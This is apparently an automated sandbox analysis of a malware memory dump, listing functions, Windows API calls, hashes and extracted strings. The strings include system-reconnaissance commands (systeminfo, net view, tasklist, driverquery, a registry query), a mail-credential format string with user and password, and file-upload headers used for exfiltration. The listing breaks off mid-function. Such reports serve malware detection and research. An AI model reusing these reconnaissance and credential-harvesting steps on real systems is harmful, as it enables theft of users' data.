Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: 791ecd5ce6e074ddf4151d69642abf4c990241849d89b6e3c7429c458396d6ac
Instruction ID: 979db86a565173a4f50176fb23936729707bbe7951ef1a5373c91891083574fb
Opcode Fuzzy Hash: 791ecd5ce6e074ddf4151d69642abf4c990241849d89b6e3c7429c458396d6ac
Instruction Fuzzy Hash: F1415D71A0010AEFDB10EF98DD81EAAB3FCEF48348B154466E959D7211EB30EA15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8118D, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,02B716BA,?,?,?,?), ref: 02B811B1
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 02B811C3
wcstombs.NTDLL ref: 02B811D1
lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,02B716BA,?,?,?), ref: 02B811F5
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 02B8120A
mbstowcs.NTDLL ref: 02B81217
HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,02B716BA,?,?,?,?,?), ref: 02B81229
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,02B716BA,?,?,?,?,?), ref: 02B81243

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
Opcode ID: 2621f84257392e6c823575d1627eac44d3c4c40c08784f16f3921f4cced146c1
Instruction ID: fc0122c458c56fecd4a77bc4f0a917ace8b8a4ec0de597273de1990b97e22a44
Opcode Fuzzy Hash: 2621f84257392e6c823575d1627eac44d3c4c40c08784f16f3921f4cced146c1
Instruction Fuzzy Hash: 7921683194020AFFCF10AFA5EE09FAE7BB9FB45394F104965F908E20A0D7719961DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B83E17, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 02B83E23
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 02B83E41
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 02B83E49
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 02B83E67
GetLastError.KERNEL32 ref: 02B83E7B
RegCloseKey.ADVAPI32(?), ref: 02B83E86
CloseHandle.KERNEL32(00000000), ref: 02B83E8D
GetLastError.KERNEL32 ref: 02B83E95

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: b28b453bc8787c9c6c7bcb6fa9a2051dad5e4ca4ee9067c45ee07abd34957082
Instruction ID: 31520582da30c4084ca8642ba7e1f73f665dfc8905ea5a71297546644bd72eed
Opcode Fuzzy Hash: b28b453bc8787c9c6c7bcb6fa9a2051dad5e4ca4ee9067c45ee07abd34957082
Instruction Fuzzy Hash: DD111E7A580109EFDB116FA1DD49A6A3BA9EB48792F014955FE0A87150DB71C921CB30

Uniqueness

Uniqueness Score: -1.00%

Function 02B7396E, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d6dcade920eab625d03d18709b16f48bf89358d2cfa20e8e38bdf2ed51bbc7f3
Instruction ID: 370d26c0c78556aee403b591b34f27fb9b655bb41983d9da2c2e9dbd61b2919f
Opcode Fuzzy Hash: d6dcade920eab625d03d18709b16f48bf89358d2cfa20e8e38bdf2ed51bbc7f3
Instruction Fuzzy Hash: BEA10075D0020AEFDF22AFA4CD44AAEBBF6EF09314F1440A9E525A2160D7319A95EF11

Uniqueness

Uniqueness Score: -1.00%

Function 02B7C550, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,772E4620,?,00000001,00000001,?,02B811EE,?,?,?,?,?,00000000), ref: 02B7C5A9
lstrlen.KERNEL32(?,?,?,00000000,772E4620,?,00000001,00000001,?,02B811EE,?,?,?,?,?,00000000), ref: 02B7C5C7
RtlAllocateHeap.NTDLL(00000000,76D26985,?), ref: 02B7C5F0
memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,02B811EE,?,?,?,?,?,00000000), ref: 02B7C607
HeapFree.KERNEL32(00000000,00000000), ref: 02B7C61A
memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,02B811EE,?,?,?,?,?,00000000), ref: 02B7C629
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,772E4620,?,00000001,00000001,?,02B811EE,?,?,?), ref: 02B7C68D

Part of subcall function 02B80158: RtlLeaveCriticalSection.NTDLL(?), ref: 02B801D5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
Opcode ID: 8b43e5c196e67088f590e94848f0db51b71f3937900b96db291e668417ffa34f
Instruction ID: 7f2bf4f5d99cb6744ce5192f01e6a2aec629fced992c5730103baf2f557d651c
Opcode Fuzzy Hash: 8b43e5c196e67088f590e94848f0db51b71f3937900b96db291e668417ffa34f
Instruction Fuzzy Hash: CE419E71900219AFCF22AFA8CC85BAE7FB5EF05394F1045AAF818A7150C771DA50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B7A32B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121stringCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(?,00000000,00000000,02B8154B,00000000,76D7F5B0,02B87D3D,61636F4C,00000001,?,?), ref: 02B7A33B
StrChrA.SHLWAPI(00000000,00000020), ref: 02B7A34C

Part of subcall function 02B832D8: lstrlen.KERNEL32(?,00000000,76D26980,?,02B8AEA4,?), ref: 02B832E1
Part of subcall function 02B832D8: memcpy.NTDLL(00000000,?,00000000,?), ref: 02B83304
Part of subcall function 02B832D8: memset.NTDLL ref: 02B83313

ExitProcess.KERNEL32 ref: 02B7A480

Part of subcall function 02B825FA: StrChrA.SHLWAPI(?,?,7612D3B0,05AE8D54,?,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B82620
Part of subcall function 02B825FA: StrTrimA.SHLWAPI(?,02B9A48C,00000000,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B8263F
Part of subcall function 02B825FA: StrChrA.SHLWAPI(?,?,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B82650
Part of subcall function 02B825FA: StrTrimA.SHLWAPI(00000001,02B9A48C,?,?,02B88517,?,00000020,05AE8D54,?,?,02B958C6,?,?), ref: 02B82662

lstrcmp.KERNEL32(?,mail), ref: 02B7A3A9

Part of subcall function 02B867CC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02B867EF
Part of subcall function 02B867CC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,00000008,?,?,?,02B77010), ref: 02B86830

Strings

/C pause dll, xrefs: 02B7A35A
mail, xrefs: 02B7A3A2

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateCommandExitFreeLineProcesslstrcmplstrlenmemcpymemset
String ID: /C pause dll$mail
API String ID: 4032499568-3657633402
Opcode ID: 8baecbeb83006bed63962a300457b4ad043dfe0e0d0fbbbfe53e0ec2bb9d4b34
Instruction ID: 783219302febee91f0703b15d3e3ea55f190279a44deae5d46df3fc721032c53
Opcode Fuzzy Hash: 8baecbeb83006bed63962a300457b4ad043dfe0e0d0fbbbfe53e0ec2bb9d4b34
Instruction Fuzzy Hash: B4311A72508301AFDB50AF65DC8892FB7EAEB84354F048DBDF9A9D2050EB71D944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02B7FEC9, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,02B9D000,02B96985), ref: 02B7FEEB
lstrlenW.KERNEL32(?,00000000,02B9D000,02B96985), ref: 02B7FEFC
lstrlenW.KERNEL32(?,00000000,02B9D000,02B96985), ref: 02B7FF0E
lstrlenW.KERNEL32(?,00000000,02B9D000,02B96985), ref: 02B7FF20
lstrlenW.KERNEL32(?,00000000,02B9D000,02B96985), ref: 02B7FF32
lstrlenW.KERNEL32(?,00000000,02B9D000,02B96985), ref: 02B7FF3E

Strings

type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s, xrefs: 02B7FFC1

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen
String ID: type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
API String ID: 1659193697-1056788794
Opcode ID: b4981bf1c770633415e3efd985aa1b06bfb47d41f1d4f0f6c5f06443ee98c69a
Instruction ID: 54cccecc6b7e7515e06f46e3f4778494487ab3a986497e6bc61062dc098d83c1
Opcode Fuzzy Hash: b4981bf1c770633415e3efd985aa1b06bfb47d41f1d4f0f6c5f06443ee98c69a
Instruction Fuzzy Hash: E6411071E01206AFCB24DFA9C880A7EF7F9FF99204B1488ADE525E7611EB74D9048B54

Uniqueness

Uniqueness Score: -1.00%

Function 02B8FFD6, Relevance: 10.6, APIs: 7, Instructions: 108memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88812
Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B8882B
Part of subcall function 02B88800: GetCurrentThreadId.KERNEL32 ref: 02B88838
Part of subcall function 02B88800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88844
Part of subcall function 02B88800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88852
Part of subcall function 02B88800: lstrcpy.KERNEL32(00000000), ref: 02B88874

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 02B9001C
StrTrimA.SHLWAPI(?,20000920), ref: 02B90039
StrTrimA.SHLWAPI(?,0A0D0920,?,?,00000001), ref: 02B900A2
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 02B900C3
DeleteFileA.KERNEL32(?,00003219), ref: 02B900E2
HeapFree.KERNEL32(00000000,?), ref: 02B900F1
HeapFree.KERNEL32(00000000,?,00003219), ref: 02B90109

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
String ID:
API String ID: 1078934163-0
Opcode ID: bfd98af19d5f843c787dc375c98e1f226fbc1a25869c91288ba86f1017d0241a
Instruction ID: d8c950deb91ff969bfceddb24dbccae75469322d7d7ddfc079f02085fdcf1f88
Opcode Fuzzy Hash: bfd98af19d5f843c787dc375c98e1f226fbc1a25869c91288ba86f1017d0241a
Instruction Fuzzy Hash: 47312F32680306AFEB11EB54DD05F6AB7E8EF45784F020C65FA48E7090D771E954CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02B87034, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 02B870B6
lstrcpy.KERNEL32(00000000,grabs=), ref: 02B870C8
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 02B870D5
lstrlen.KERNEL32(grabs=,?,?,?,?,?,00000000,00000000,?), ref: 02B870E7
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 02B87118

Strings

grabs=, xrefs: 02B870C2, 02B870E2

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID: grabs=
API String ID: 2734445380-3012740322
Opcode ID: 43c0939c0c9e8d82d637ed0b4fcd58dd561ed2d93c2c2f4f35fb6184ec8d89fb
Instruction ID: 2c7c3e5ae209c3966fea614aa509e4bfb638956821793733f514afda7dee1346
Opcode Fuzzy Hash: 43c0939c0c9e8d82d637ed0b4fcd58dd561ed2d93c2c2f4f35fb6184ec8d89fb
Instruction Fuzzy Hash: 2231AF36900209BFDB11EF95CD89EEEBBB9EF05354F104564F81992210DB349960DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B824F1, Relevance: 10.6, APIs: 7, Instructions: 93fileCOMMON

Download Yara Rule

APIs

Part of subcall function 02B89695: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,02B82509,?,?,00000000), ref: 02B896A1
Part of subcall function 02B89695: _aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 02B896B7
Part of subcall function 02B89695: _snwprintf.NTDLL ref: 02B896DC
Part of subcall function 02B89695: CreateFileMappingW.KERNEL32(000000FF,02B9E0D4,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 02B896F8
Part of subcall function 02B89695: GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,02B82509,?), ref: 02B8970A
Part of subcall function 02B89695: CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,02B82509), ref: 02B89742

UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?,00000000), ref: 02B82528
CloseHandle.KERNEL32(?), ref: 02B82531
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 02B82551
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 02B82577
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B917C0,?), ref: 02B825B0
GetLastError.KERNEL32(02B8A098,00000000,00000000), ref: 02B825DF
CloseHandle.KERNEL32(00000000,02B8A098,00000000,00000000), ref: 02B825EF

Part of subcall function 02B87854: lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,02B7F7B7,004F0053,00000000), ref: 02B87860
Part of subcall function 02B87854: memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,02B7F7B7,004F0053,00000000), ref: 02B87888
Part of subcall function 02B87854: memset.NTDLL ref: 02B8789A

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Wow64$CloseFileHandle$EnableErrorLastRedirectionTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 3181697882-0
Opcode ID: ffe00625cfeb77793d2bc8abf50dbcd159b5d4ebce79adf27e8ad8fad0fc6529
Instruction ID: 3b7850337a7d63133b92ea74919de003606ee8f50ce1b8bced55e6a76d52d806
Opcode Fuzzy Hash: ffe00625cfeb77793d2bc8abf50dbcd159b5d4ebce79adf27e8ad8fad0fc6529
Instruction Fuzzy Hash: 6131E072E80254EBEB00BBB4DE64BAE77F9EB45355F1008A6EC09D7181D730DA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B794B4, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,76D25520,?,?,?,02B71647,0000010D,00000000,00000000), ref: 02B794E4
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 02B794FA
memcpy.NTDLL(00000010,?,00000000,?,?,?,02B71647,0000010D), ref: 02B79530
memcpy.NTDLL(00000010,00000000,02B71647,?,?,?,02B71647), ref: 02B7954B
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 02B79569
GetLastError.KERNEL32(?,?,?,02B71647), ref: 02B79573
HeapFree.KERNEL32(00000000,00000000,?,?,?,02B71647), ref: 02B79599

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID:
API String ID: 2237239663-0
Opcode ID: 87aa31b5e7ab2ff1263557781c5da09dc954dc3f93b915d5ed6ca5641669663e
Instruction ID: d2c49fdf78d1bc10c1e2160c19878a14b50dd4d94fdd37212aeeaa218b370c12
Opcode Fuzzy Hash: 87aa31b5e7ab2ff1263557781c5da09dc954dc3f93b915d5ed6ca5641669663e
Instruction Fuzzy Hash: B431BF36900719EFDB20DFA5D945AAB7BB9FB44394F044869FD19D3241E330DA64CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8ABAA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8B8FB: RtlEnterCriticalSection.NTDLL(02B9E268), ref: 02B8B903
Part of subcall function 02B8B8FB: RtlLeaveCriticalSection.NTDLL(02B9E268), ref: 02B8B918
Part of subcall function 02B8B8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 02B8B931

RtlAllocateHeap.NTDLL(00000000,?,Blocked), ref: 02B8ABDA
memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,02B7AF7F,?,00000000), ref: 02B8ABEB
lstrcmpi.KERNEL32(00000002,?), ref: 02B8AC31
memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,02B7AF7F,?,00000000), ref: 02B8AC45
HeapFree.KERNEL32(00000000,00000000,Blocked,00000000,?,00000000,?,?,?,?,?,?,?,02B7AF7F,?,00000000), ref: 02B8AC84

Strings

Blocked, xrefs: 02B8ABB3, 02B8AC68

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked
API String ID: 733514052-367579676
Opcode ID: c5fcf2aeead656d56f9cd7c798daa732423741c7777161afb3aa7bde5df634e8
Instruction ID: b22b325c8b3037af6d358e5b274d0abb1a2a11b4ba836eeb894c3f6921cc8095
Opcode Fuzzy Hash: c5fcf2aeead656d56f9cd7c798daa732423741c7777161afb3aa7bde5df634e8
Instruction Fuzzy Hash: FD21D172900214BBDB10BFA8CD85BAE7BB9FB04394F1444AAFA19A3200D7708D54CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B83166, Relevance: 10.6, APIs: 7, Instructions: 82stringfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 02B8317E
lstrcmpiW.KERNEL32(00000000,0065002E), ref: 02B831B5
lstrcmpiW.KERNEL32(?,0064002E), ref: 02B831CA
lstrlenW.KERNEL32(?), ref: 02B831D1
CloseHandle.KERNEL32(?), ref: 02B831F9
DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 02B83225
RtlLeaveCriticalSection.NTDLL(00000000), ref: 02B83242

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 1496873005-0
Opcode ID: d6beaa1503a4750f9efa4bca9b86198a51f29794f1660325406e4d7d53d3dca0
Instruction ID: d3bd8618b24e49953483a967ccf483f0f77cd797ad7249cbf51571441b91c2d7
Opcode Fuzzy Hash: d6beaa1503a4750f9efa4bca9b86198a51f29794f1660325406e4d7d53d3dca0
Instruction Fuzzy Hash: DC218371A00205ABDB10BFB5DD84F6B7BFCEF04A84B1009E5E94AE3141EB31E915CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B7F146, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,?,?,driverquery.exe >,?,?,tasklist.exe /SVC >,?,?,nslookup 127.0.0.1 >,?,?,net view >), ref: 02B7F209

Strings

net view >, xrefs: 02B7F175
nslookup 127.0.0.1 >, xrefs: 02B7F18B
systeminfo.exe >, xrefs: 02B7F15B
tasklist.exe /SVC >, xrefs: 02B7F1A1
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >, xrefs: 02B7F1CD
driverquery.exe >, xrefs: 02B7F1B7

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: driverquery.exe >$net view >$nslookup 127.0.0.1 >$reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >$systeminfo.exe >$tasklist.exe /SVC >
API String ID: 3298025750-3743462336
Opcode ID: bb37af2e1ca3dfd7ab3c2a74fd779b1f069bc982fce9a6d5d055677021b4886a
Instruction ID: 6f7d1df04900e49c591ddb3f42c9080d278d7c55cbb779b69c73a59a95858a8a
Opcode Fuzzy Hash: bb37af2e1ca3dfd7ab3c2a74fd779b1f069bc982fce9a6d5d055677021b4886a
Instruction Fuzzy Hash: 0A111233D02573239A3135AA8885F7B9A99C742F58B1B06E5FD64F7E10CB419C80E5E5

Uniqueness

Uniqueness Score: -1.00%

Function 02B84344, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02B7436A,00000000,02B9E260,02B9E280,?,?,02B7436A,02B7AB0F,02B9E260), ref: 02B84354
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 02B8436A
lstrlen.KERNEL32(02B7AB0F,?,?,02B7436A,02B7AB0F,02B9E260), ref: 02B84372
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 02B8437E
lstrcpy.KERNEL32(02B9E260,02B7436A), ref: 02B84394
HeapFree.KERNEL32(00000000,00000000,?,?,02B7436A,02B7AB0F,02B9E260), ref: 02B843E8
HeapFree.KERNEL32(00000000,02B9E260,?,?,02B7436A,02B7AB0F,02B9E260), ref: 02B843F7

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: ddf17fbf37f7aed027422a8fa060526a558de38717cedbc313414dc6c76fed26
Instruction ID: d276ae5f8326a6d70c8ef1b501b2a31eb096153d486e2116784275ac7ed70bdf
Opcode Fuzzy Hash: ddf17fbf37f7aed027422a8fa060526a558de38717cedbc313414dc6c76fed26
Instruction Fuzzy Hash: AF213831504245BFEB226F69ED44F6A7FBAEF46384F0445A8E48897251C7719C22C770

Uniqueness

Uniqueness Score: -1.00%

Function 02B786ED, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000001,772DEB70), ref: 02B7870D

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

wsprintfA.USER32 ref: 02B78737

Part of subcall function 02B8A1FF: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02B9470F), ref: 02B8A215
Part of subcall function 02B8A1FF: wsprintfA.USER32 ref: 02B8A23D
Part of subcall function 02B8A1FF: lstrlen.KERNEL32(?), ref: 02B8A24C
Part of subcall function 02B8A1FF: wsprintfA.USER32 ref: 02B8A28C
Part of subcall function 02B8A1FF: wsprintfA.USER32 ref: 02B8A2C1
Part of subcall function 02B8A1FF: memcpy.NTDLL(00000000,?,?), ref: 02B8A2CE
Part of subcall function 02B8A1FF: memcpy.NTDLL(00000008,02B983E4,00000002,00000000,?,?), ref: 02B8A2E3
Part of subcall function 02B8A1FF: wsprintfA.USER32 ref: 02B8A306

HeapFree.KERNEL32(00000000,?,?,?,?), ref: 02B787AC

Part of subcall function 02B95E4D: RtlEnterCriticalSection.NTDLL(05AE8D20), ref: 02B95E63
Part of subcall function 02B95E4D: RtlLeaveCriticalSection.NTDLL(05AE8D20), ref: 02B95E7E

HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 02B78794
HeapFree.KERNEL32(00000000,?), ref: 02B787A0

Strings

Content-Disposition: form-data; name="upload_file"; filename="%s", xrefs: 02B78731
Content-Type: application/octet-stream, xrefs: 02B78729

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID: Content-Disposition: form-data; name="upload_file"; filename="%s"$Content-Type: application/octet-stream
API String ID: 3553201432-2405033784
Opcode ID: b59f9907a916704871f932d7eef05f55589b31e1993a4568cd6ac7b4e86aaeea
Instruction ID: ec20fa909ba64986981a0a5bb6a0005320e225707bc93544146a0fff22631b70
Opcode Fuzzy Hash: b59f9907a916704871f932d7eef05f55589b31e1993a4568cd6ac7b4e86aaeea
Instruction Fuzzy Hash: 3F211676C00249BBCF12AF96DD48D9FBF79FF45350B004966F925A2120D7718660DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B861ED, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 72stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,76D25520,?,00000000,?,?,02B8F520,?,00000000,?,00000000,00000000,?,?,?,?), ref: 02B861FE

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

Part of subcall function 02B86635: memset.NTDLL ref: 02B8663D

Part of subcall function 02B77D07: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,02B78663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,02B81117), ref: 02B77D13
Part of subcall function 02B77D07: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02B78663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 02B77D71
Part of subcall function 02B77D07: lstrcpy.KERNEL32(00000000,00000000), ref: 02B77D81

lstrcpy.KERNEL32(00000038,?), ref: 02B86239

Strings

Host:, xrefs: 02B86257
Accept-Encoding:, xrefs: 02B86261
Connection:, xrefs: 02B86275
GET, xrefs: 02B8624D
User-Agent:, xrefs: 02B8626B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocateHeapmemcpymemset
String ID: Accept-Encoding:$Connection:$GET$Host:$User-Agent:
API String ID: 3405161297-3467890120
Opcode ID: eae723b8e7bb479bb6aa9fcfc5e6bc78ad803f518d381712bf35cc4f10c9e9a1
Instruction ID: 97ce8c4114fe8f02039aa95b3ee4f95fe864044a9a4b28322161b14f9c91116f
Opcode Fuzzy Hash: eae723b8e7bb479bb6aa9fcfc5e6bc78ad803f518d381712bf35cc4f10c9e9a1
Instruction Fuzzy Hash: B8119E71600105BEAF01BFA5DE89D7E7BAEEF8139870140E6F559E2510DB78CA10DA62

Uniqueness

Uniqueness Score: -1.00%

Function 02B86572, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88812
Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B8882B
Part of subcall function 02B88800: GetCurrentThreadId.KERNEL32 ref: 02B88838
Part of subcall function 02B88800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88844
Part of subcall function 02B88800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88852
Part of subcall function 02B88800: lstrcpy.KERNEL32(00000000), ref: 02B88874

